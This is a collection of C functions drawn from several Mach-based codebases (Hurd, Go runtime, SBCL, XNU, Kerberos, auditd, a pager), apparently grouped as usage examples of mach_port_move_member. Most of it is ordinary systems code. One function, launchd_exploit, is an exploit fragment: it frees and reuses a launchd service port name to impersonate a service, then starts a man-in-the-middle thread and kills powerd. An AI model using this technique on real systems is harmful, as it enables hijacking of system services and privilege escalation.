mach_port_t ports_claim_right (void *portstruct) { error_t err; struct port_info *pi = portstruct; mach_port_t ret = pi->port_right; if (ret == MACH_PORT_NULL) return ret; mutex_lock (&_ports_lock); hurd_ihash_locp_remove (&pi->bucket->htable, pi->hentry); err = mach_port_move_member (mach_task_self (), ret, MACH_PORT_NULL); assert_perror (err); pi->port_right = MACH_PORT_NULL; if (pi->flags & PORT_HAS_SENDRIGHTS) { pi->flags &= ~PORT_HAS_SENDRIGHTS; mutex_unlock (&_ports_lock); ports_port_deref (pi); } else mutex_unlock (&_ports_lock); return ret; }
void darwin_arm_init_thread_exception_port() { // Called by each new OS thread to bind its EXC_BAD_ACCESS exception // to mach_exception_handler_port_set. int ret; mach_port_t port = MACH_PORT_NULL; ret = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); if (ret) { fprintf(stderr, "runtime/cgo: mach_port_allocate failed: %d\n", ret); abort(); } ret = mach_port_insert_right( mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); if (ret) { fprintf(stderr, "runtime/cgo: mach_port_insert_right failed: %d\n", ret); abort(); } ret = thread_set_exception_ports( mach_thread_self(), EXC_MASK_BAD_ACCESS, port, EXCEPTION_DEFAULT, THREAD_STATE_NONE); if (ret) { fprintf(stderr, "runtime/cgo: thread_set_exception_ports failed: %d\n", ret); abort(); } ret = pthread_mutex_lock(&mach_exception_handler_port_set_mu); if (ret) { fprintf(stderr, "runtime/cgo: pthread_mutex_lock failed: %d\n", ret); abort(); } ret = mach_port_move_member( mach_task_self(), port, mach_exception_handler_port_set); if (ret) { fprintf(stderr, "runtime/cgo: mach_port_move_member failed: %d\n", ret); abort(); } ret = pthread_mutex_unlock(&mach_exception_handler_port_set_mu); if (ret) { fprintf(stderr, "runtime/cgo: pthread_mutex_unlock failed: %d\n", ret); abort(); } }
/* tell the kernel that we want EXC_BAD_ACCESS exceptions sent to the exception port (which is being listened to do by the mach exception handling thread). */ kern_return_t mach_thread_init(mach_port_t thread_exception_port) { kern_return_t ret; mach_port_t current_mach_thread; /* allocate a named port for the thread */ FSHOW((stderr, "Allocating mach port %x\n", thread_exception_port)); ret = mach_port_allocate_name(current_mach_task, MACH_PORT_RIGHT_RECEIVE, thread_exception_port); if (ret) { lose("mach_port_allocate_name failed with return_code %d\n", ret); } /* establish the right for the thread_exception_port to send messages */ ret = mach_port_insert_right(current_mach_task, thread_exception_port, thread_exception_port, MACH_MSG_TYPE_MAKE_SEND); if (ret) { lose("mach_port_insert_right failed with return_code %d\n", ret); } current_mach_thread = mach_thread_self(); ret = thread_set_exception_ports(current_mach_thread, EXC_MASK_BAD_ACCESS | EXC_MASK_BAD_INSTRUCTION, thread_exception_port, EXCEPTION_DEFAULT, THREAD_STATE_NONE); if (ret) { lose("thread_set_exception_ports failed with return_code %d\n", ret); } ret = mach_port_deallocate (current_mach_task, current_mach_thread); if (ret) { lose("mach_port_deallocate failed with return_code %d\n", ret); } ret = mach_port_move_member(current_mach_task, thread_exception_port, mach_exception_handler_port_set); if (ret) { lose("mach_port_move_member failed with return_code %d\n", ret); } return ret; }
int _kernelrpc_mach_port_move_member_trap(struct _kernelrpc_mach_port_move_member_args *args) { task_t task = port_name_to_task(args->target); int rv = MACH_SEND_INVALID_DEST; if (task != current_task()) goto done; rv = mach_port_move_member(task->itk_space, args->member, args->after); done: if (task) task_deallocate(task); return (rv); }
kern_return_t k5_ipc_server_create_client_connection (mach_port_t in_server_port, mach_port_t *out_connection_port) { kern_return_t err = KERN_SUCCESS; mach_port_t connection_port = MACH_PORT_NULL; mach_port_t old_notification_target = MACH_PORT_NULL; if (!err) { err = mach_port_allocate (mach_task_self (), MACH_PORT_RIGHT_RECEIVE, &connection_port); } if (!err) { err = mach_port_move_member (mach_task_self (), connection_port, g_listen_port_set); } if (!err) { /* request no-senders notification so we can tell when client quits/crashes */ err = mach_port_request_notification (mach_task_self (), connection_port, MACH_NOTIFY_NO_SENDERS, 1, connection_port, MACH_MSG_TYPE_MAKE_SEND_ONCE, &old_notification_target ); } if (!err) { err = k5_ipc_server_add_client (connection_port); } if (!err) { *out_connection_port = connection_port; connection_port = MACH_PORT_NULL; } if (MACH_PORT_VALID (connection_port)) { mach_port_deallocate (mach_task_self (), connection_port); } return err; }
void launchd_exploit(char* app_group) { char* target_service_name = default_target_service_name; // allocate the receive rights which we will try to replace the service with: // (we'll also use them to loop the mach port name in the target) size_t n_ports = 0x1000; mach_port_t* ports = calloc(sizeof(void*), n_ports); for (int i = 0; i < n_ports; i++) { kern_return_t err; err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]); if (err != KERN_SUCCESS) { printf("failed to allocate port: %s\n", mach_error_string(err)); exit(EXIT_FAILURE); } err = mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND); if (err != KERN_SUCCESS) { printf("failed to insert send right: %s\n", mach_error_string(err)); exit(EXIT_FAILURE); } } // generate some service names we can use: char** names = calloc(sizeof(char*), n_ports); for (int i = 0; i < n_ports; i++) { char name[strlen(app_group)+64]; sprintf(name, "%s.%d", app_group, i); names[i] = strdup(name); } // lookup a send right to the target to be replaced mach_port_t target_service = lookup(target_service_name); // free the target in launchd do_free(bootstrap_port, target_service); // send one smaller looper message to push the free'd name down the free list: send_looper(bootstrap_port, ports, 0x100, MACH_MSG_TYPE_MAKE_SEND); // send the larger ones to loop the generation number whilst leaving the name in the middle of the long freelist for (int i = 0; i < 62; i++) { send_looper(bootstrap_port, ports, 0x200, MACH_MSG_TYPE_MAKE_SEND); } // now that the name should have looped round (and still be near the middle of the freelist // try to replace it by registering a lot of new services for (int i = 0; i < n_ports; i++) { kern_return_t err = bootstrap_register(bootstrap_port, names[i], ports[i]); if (err != KERN_SUCCESS) { printf("failed to register service %d, continuing anyway...\n", i); } } // add all those receive rights to a port set: mach_port_t ps; mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_PORT_SET, &ps); for (int i = 0; i < n_ports; i++) { mach_port_move_member(mach_task_self(), ports[i], ps); } start_mitm_thread(target_service, ps); kill_powerd(); return; }
error_t ports_transfer_right (void *tostruct, void *fromstruct) { struct port_info *topi = tostruct; struct port_info *frompi = fromstruct; mach_port_t port; int dereffrompi = 0; int dereftopi = 0; int hassendrights = 0; error_t err; mutex_lock (&_ports_lock); /* Fetch the port in FROMPI and clear its use */ port = frompi->port_right; if (port != MACH_PORT_NULL) { hurd_ihash_locp_remove (&frompi->bucket->htable, frompi->hentry); frompi->port_right = MACH_PORT_NULL; if (frompi->flags & PORT_HAS_SENDRIGHTS) { frompi->flags &= ~PORT_HAS_SENDRIGHTS; hassendrights = 1; dereffrompi = 1; } } /* Destroy the existing right in TOPI. */ if (topi->port_right != MACH_PORT_NULL) { hurd_ihash_locp_remove (&topi->bucket->htable, topi->hentry); err = mach_port_mod_refs (mach_task_self (), topi->port_right, MACH_PORT_RIGHT_RECEIVE, -1); assert_perror (err); if ((topi->flags & PORT_HAS_SENDRIGHTS) && !hassendrights) { dereftopi = 1; topi->flags &= ~PORT_HAS_SENDRIGHTS; } else if (((topi->flags & PORT_HAS_SENDRIGHTS) == 0) && hassendrights) { topi->flags |= PORT_HAS_SENDRIGHTS; topi->refcnt++; } } /* Install the new right in TOPI. */ topi->port_right = port; topi->cancel_threshold = frompi->cancel_threshold; topi->mscount = frompi->mscount; if (port) { hurd_ihash_add (&topi->bucket->htable, port, topi); if (topi->bucket != frompi->bucket) { err = mach_port_move_member (mach_task_self (), port, topi->bucket->portset); assert_perror (err); } } mutex_unlock (&_ports_lock); /* Take care of any lowered reference counts. */ if (dereffrompi) ports_port_deref (frompi); if (dereftopi) ports_port_deref (topi); return 0; }
int32_t k5_ipc_server_listen_loop (void) { /* Run the Mach IPC listen loop. * This will call k5_ipc_server_create_client_connection for new clients * and k5_ipc_server_request for existing clients */ kern_return_t err = KERN_SUCCESS; char *service = NULL; char *lookup = NULL; mach_port_t lookup_port = MACH_PORT_NULL; mach_port_t boot_port = MACH_PORT_NULL; mach_port_t previous_notify_port = MACH_PORT_NULL; if (!err) { err = k5_ipc_server_get_lookup_and_service_names (&lookup, &service); } if (!err) { /* Get the bootstrap port */ err = task_get_bootstrap_port (mach_task_self (), &boot_port); } if (!err) { /* We are an on-demand server so our lookup port already exists. */ err = bootstrap_check_in (boot_port, lookup, &lookup_port); } if (!err) { /* We are an on-demand server so our service port already exists. */ err = bootstrap_check_in (boot_port, service, &g_service_port); } if (!err) { /* Create the port set that the server will listen on */ err = mach_port_allocate (mach_task_self (), MACH_PORT_RIGHT_RECEIVE, &g_notify_port); } if (!err) { /* Ask for notification when the server port has no more senders * A send-once right != a send right so our send-once right will * not interfere with the notification */ err = mach_port_request_notification (mach_task_self (), g_service_port, MACH_NOTIFY_NO_SENDERS, true, g_notify_port, MACH_MSG_TYPE_MAKE_SEND_ONCE, &previous_notify_port); } if (!err) { /* Create the port set that the server will listen on */ err = mach_port_allocate (mach_task_self (), MACH_PORT_RIGHT_PORT_SET, &g_listen_port_set); } if (!err) { /* Add the lookup port to the port set */ err = mach_port_move_member (mach_task_self (), lookup_port, g_listen_port_set); } if (!err) { /* Add the service port to the port set */ err = mach_port_move_member (mach_task_self (), g_service_port, g_listen_port_set); } if (!err) { /* Add the notify port to the port set */ err = mach_port_move_member (mach_task_self (), g_notify_port, g_listen_port_set); } while (!err && !g_ready_to_quit) { /* Handle one message at a time so we can check to see if * the server wants to quit */ err = mach_msg_server_once (k5_ipc_request_demux, K5_IPC_MAX_MSG_SIZE, g_listen_port_set, MACH_MSG_OPTION_NONE); } /* Clean up the ports and strings */ if (MACH_PORT_VALID (g_notify_port)) { mach_port_destroy (mach_task_self (), g_notify_port); g_notify_port = MACH_PORT_NULL; } if (MACH_PORT_VALID (g_listen_port_set)) { mach_port_destroy (mach_task_self (), g_listen_port_set); g_listen_port_set = MACH_PORT_NULL; } if (MACH_PORT_VALID (boot_port)) { mach_port_deallocate (mach_task_self (), boot_port); } free (service); free (lookup); return err; }
int main() { kern_return_t kr; mach_port_t bport, port, pset; struct msg_recv message; struct msg_send reply; struct kevent64_s kev; int kq, r; task_get_special_port(mach_task_self(), TASK_BOOTSTRAP_PORT, &bport); syslog(LOG_ERR, "bootstrap port: %d", bport); kr = bootstrap_check_in(bootstrap_port, "mach.service-test", &port); if (kr != KERN_SUCCESS) { syslog(LOG_ERR, "bootstrap_check_in: kr=%d", kr); exit(1); } syslog(LOG_ERR, "service port: %d", port); kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_PORT_SET, &pset); if (kr != KERN_SUCCESS) { syslog(LOG_ERR, "mach_port_allocate: kr=%d", kr); exit(1); } kr = mach_port_move_member(mach_task_self(), port, pset); if (kr != KERN_SUCCESS) { syslog(LOG_ERR, "mach_port_move_member: kr=%d", kr); exit(1); } kq = kqueue(); syslog(LOG_ERR, "kqueue fd: %d", kq); memset(&kev, 0, sizeof(struct kevent64_s)); EV_SET64(&kev, pset, EVFILT_MACHPORT, EV_ADD | EV_ENABLE, 0, 0, 0, 0, 0); if (kevent64(kq, &kev, 1, NULL, 0, 0, NULL) < 0) { syslog(LOG_ERR, "kevent64: %s (%d)", strerror(errno), errno); return 0; } for (;;) { message.hdr.msgh_local_port = port; message.hdr.msgh_size = sizeof(struct msg_recv); r = kevent64(kq, NULL, 0, &kev, 1, 0, NULL); if (r < 0) { syslog(LOG_ERR, "kevent64 failed: %s (%d)", strerror(errno), errno); continue; } syslog(LOG_ERR, "kevent64: events=%d", r); kr = mach_msg_receive((mach_msg_header_t *)&message); if (kr != KERN_SUCCESS) syslog(LOG_ERR, "mach_msg_receive failure: kr=%d", kr); else syslog(LOG_ERR, "received message on port %d: body=%s", message.hdr.msgh_remote_port, message.body); memset(&reply, 0, sizeof(struct msg_send)); sprintf(&reply.body[0], "hello buddy"); reply.hdr.msgh_local_port = MACH_PORT_NULL; reply.hdr.msgh_remote_port = message.hdr.msgh_remote_port; reply.hdr.msgh_size = sizeof(struct msg_send); reply.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); kr = mach_msg_send((mach_msg_header_t *)&reply); if (kr != KERN_SUCCESS) syslog(LOG_ERR, "mach_msg_send failure: kr=%d", kr); } }
static void ux_handler(void) { task_t self = current_task(); mach_port_name_t exc_port_name; mach_port_name_t exc_set_name; /* self->kernel_vm_space = TRUE; */ ux_handler_self = self; /* * Allocate a port set that we will receive on. */ if (mach_port_allocate(get_task_ipcspace(ux_handler_self), MACH_PORT_RIGHT_PORT_SET, &exc_set_name) != MACH_MSG_SUCCESS) panic("ux_handler: port_set_allocate failed"); /* * Allocate an exception port and use object_copyin to * translate it to the global name. Put it into the set. */ if (mach_port_allocate(get_task_ipcspace(ux_handler_self), MACH_PORT_RIGHT_RECEIVE, &exc_port_name) != MACH_MSG_SUCCESS) panic("ux_handler: port_allocate failed"); if (mach_port_move_member(get_task_ipcspace(ux_handler_self), exc_port_name, exc_set_name) != MACH_MSG_SUCCESS) panic("ux_handler: port_set_add failed"); if (ipc_object_copyin(get_task_ipcspace(self), exc_port_name, MACH_MSG_TYPE_MAKE_SEND, (void *) &ux_exception_port) != MACH_MSG_SUCCESS) panic("ux_handler: object_copyin(ux_exception_port) failed"); proc_list_lock(); thread_wakeup(&ux_exception_port); proc_list_unlock(); /* Message handling loop. */ for (;;) { struct rep_msg { mach_msg_header_t Head; NDR_record_t NDR; kern_return_t RetCode; } rep_msg; struct exc_msg { mach_msg_header_t Head; /* start of the kernel processed data */ mach_msg_body_t msgh_body; mach_msg_port_descriptor_t thread; mach_msg_port_descriptor_t task; /* end of the kernel processed data */ NDR_record_t NDR; exception_type_t exception; mach_msg_type_number_t codeCnt; mach_exception_data_t code; /* some times RCV_TO_LARGE probs */ char pad[512]; } exc_msg; mach_port_name_t reply_port; kern_return_t result; exc_msg.Head.msgh_local_port = CAST_MACH_NAME_TO_PORT(exc_set_name); exc_msg.Head.msgh_size = sizeof (exc_msg); #if 0 result = mach_msg_receive(&exc_msg.Head); #else result = mach_msg_receive(&exc_msg.Head, MACH_RCV_MSG, sizeof (exc_msg), exc_set_name, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL, 0); #endif if (result == MACH_MSG_SUCCESS) { reply_port = CAST_MACH_PORT_TO_NAME(exc_msg.Head.msgh_remote_port); if (mach_exc_server(&exc_msg.Head, &rep_msg.Head)) { result = mach_msg_send(&rep_msg.Head, MACH_SEND_MSG, sizeof (rep_msg),MACH_MSG_TIMEOUT_NONE,MACH_PORT_NULL); if (reply_port != 0 && result != MACH_MSG_SUCCESS) mach_port_deallocate(get_task_ipcspace(ux_handler_self), reply_port); } } else if (result == MACH_RCV_TOO_LARGE) /* ignore oversized messages */; else panic("exception_handler"); } }
struct i_mem_object * imo_create( struct inode *inode, boolean_t allocate_port) { struct i_mem_object *imo; kern_return_t kr; imo = (struct i_mem_object *) kmalloc(sizeof (struct i_mem_object), GFP_KERNEL); if (imo == NULL) return MEMORY_OBJECT_NULL; if (inode->i_mem_object != NULL) { /* * Somebody else beat us... */ kfree(imo); return inode->i_mem_object; } inode->i_count++; inode->i_mem_object = imo; imo->imo_mem_obj = MACH_PORT_NULL; imo->imo_mem_obj_control = MACH_PORT_NULL; imo->imo_refcnt = 0; imo->imo_cacheable = TRUE; imo->imo_attrchange = FALSE; imo->imo_attrchange_wait = NULL; imo->imo_copy_strategy = MEMORY_OBJECT_COPY_DELAY; imo->imo_errors = 0; imo->imo_inode = inode; imo->imo_urefs = 0; if (allocate_port) { /* * Allocate a memory object port */ kr = serv_port_allocate_name(&imo->imo_mem_obj, imo); if (kr != KERN_SUCCESS) { panic("imo_create: can't allocate port"); } /* * Get a send right for this port */ kr = mach_port_insert_right(mach_task_self(), imo->imo_mem_obj, imo->imo_mem_obj, MACH_MSG_TYPE_MAKE_SEND); if (kr != KERN_SUCCESS) { MACH3_DEBUG(0, kr, ("imo_create: mach_port_insert_right(0x%x)", imo->imo_mem_obj)); panic("imo_create: can't allocate send right"); } /* * Add the new memory_object port to the port set */ kr = mach_port_move_member(mach_task_self(), imo->imo_mem_obj, inode_pager_port_set); if (kr != KERN_SUCCESS) { MACH3_DEBUG(0, kr, ("imo_create: mach_port_move_member(0x%x)", imo->imo_mem_obj)); panic("imo_create: can't add object to port set"); } } return imo; }
void default_pager_initialize( mach_port_t host_port) { kern_return_t kr; static char here[] = "default_pager_initialize"; /* * Initial thread and task ports. */ default_pager_self = mach_task_self(); default_pager_default_thread = mach_thread_self(); PRINTF_LOCK_INIT(); /* * Make ourselves unswappable. */ kr = task_swappable(default_pager_host_port, default_pager_self, FALSE); if (kr != KERN_SUCCESS) dprintf(("task_swappable failed 0x%x %s\n", kr, mach_error_string(kr))); /* * Exported DMM port. */ kr = mach_port_allocate(default_pager_self, MACH_PORT_RIGHT_RECEIVE, &default_pager_default_port); if (kr != KERN_SUCCESS) Panic("default port"); /* * Port sets. */ kr = mach_port_allocate(default_pager_self, MACH_PORT_RIGHT_PORT_SET, &default_pager_internal_set); if (kr != KERN_SUCCESS) Panic("internal set"); kr = mach_port_allocate(default_pager_self, MACH_PORT_RIGHT_PORT_SET, &default_pager_external_set); if (kr != KERN_SUCCESS) Panic("external set"); /* * Export pager interfaces. */ #ifdef USER_PAGER if ((kr = netname_check_in(name_server_port, "UserPager", default_pager_self, default_pager_default_port)) != KERN_SUCCESS) { dprintf(("netname_check_in returned 0x%x %s\n", kr, mach_error_string(kr))); exit(1); } #else /* USER_PAGER */ { int clsize; memory_object_t DMM; /* get a send right for vm_set_default_memory_manager */ kr = mach_port_insert_right(default_pager_self, default_pager_default_port, default_pager_default_port, MACH_MSG_TYPE_MAKE_SEND); DMM = default_pager_default_port; clsize = (vm_page_size << vstruct_def_clshift); kr = host_default_memory_manager(host_port, &DMM, clsize); if ((kr != KERN_SUCCESS) || (DMM != MACH_PORT_NULL)) Panic("default memory manager"); /* release the extra send right */ (void) mach_port_mod_refs(default_pager_self, default_pager_default_port, MACH_PORT_RIGHT_SEND, -1); } #endif /* USER_PAGER */ kr = mach_port_allocate(default_pager_self, MACH_PORT_RIGHT_PORT_SET, &default_pager_default_set); if (kr != KERN_SUCCESS) Panic("default set"); kr = mach_port_move_member(default_pager_self, default_pager_default_port, default_pager_default_set); if (kr != KERN_SUCCESS) Panic("set up default"); /* * Arrange for wiring privileges. */ wire_setup(host_port); /* * Find out how many CPUs we have, to determine the number * of threads to create. */ if (default_pager_internal_count == 0) { host_basic_info_data_t h_info; mach_msg_type_number_t h_info_count; h_info_count = HOST_BASIC_INFO_COUNT; (void) host_info(host_port, HOST_BASIC_INFO, (host_info_t) &h_info, &h_info_count); /* * Random computation to get more parallelism on * multiprocessors. */ default_pager_internal_count = ((h_info.avail_cpus > 32) ? 32 : h_info.avail_cpus) / 4 + 3; } /* * Vm variables. */ vm_page_mask = vm_page_size - 1; vm_page_shift = log2(vm_page_size); /* * List of all vstructs. */ VSL_LOCK_INIT(); queue_init(&vstruct_list.vsl_queue); queue_init(&vstruct_list.vsl_leak_queue); vstruct_list.vsl_count = 0; VSTATS_LOCK_INIT(&global_stats.gs_lock); bs_initialize(); }
static int mach_setup(int launchd_flag) { mach_msg_type_name_t poly; /* * Allocate a port set. */ if (mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_PORT_SET, &port_set) != KERN_SUCCESS) { auditd_log_err("Allocation of port set failed"); return (-1); } /* * Allocate a signal reflection port. */ if (mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &signal_port) != KERN_SUCCESS || mach_port_move_member(mach_task_self(), signal_port, port_set) != KERN_SUCCESS) { auditd_log_err("Allocation of signal port failed"); return (-1); } /* * Allocate a trigger port. */ if (launchd_flag) { /* * If started under launchd, lookup port in launchd dictionary. */ if ((control_port = lookup_machport(__AUDIT_LAUNCHD_LABEL)) == MACH_PORT_NULL || mach_port_move_member(mach_task_self(), control_port, port_set) != KERN_SUCCESS) { auditd_log_err("Cannot get Mach control port" " via launchd"); return (-1); } else auditd_log_debug("Mach control port registered" " via launchd"); } else { /* * If not started under launchd, allocate port and register. */ if (mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &control_port) != KERN_SUCCESS || mach_port_move_member(mach_task_self(), control_port, port_set) != KERN_SUCCESS) auditd_log_err("Allocation of trigger port failed"); /* * Create a send right on our trigger port. */ mach_port_extract_right(mach_task_self(), control_port, MACH_MSG_TYPE_MAKE_SEND, &control_port, &poly); /* * Register the trigger port with the kernel. */ if (host_set_audit_control_port(mach_host_self(), control_port) != KERN_SUCCESS) { auditd_log_err("Cannot set Mach control port"); return (-1); } else auditd_log_debug("Mach control port registered"); } return (0); }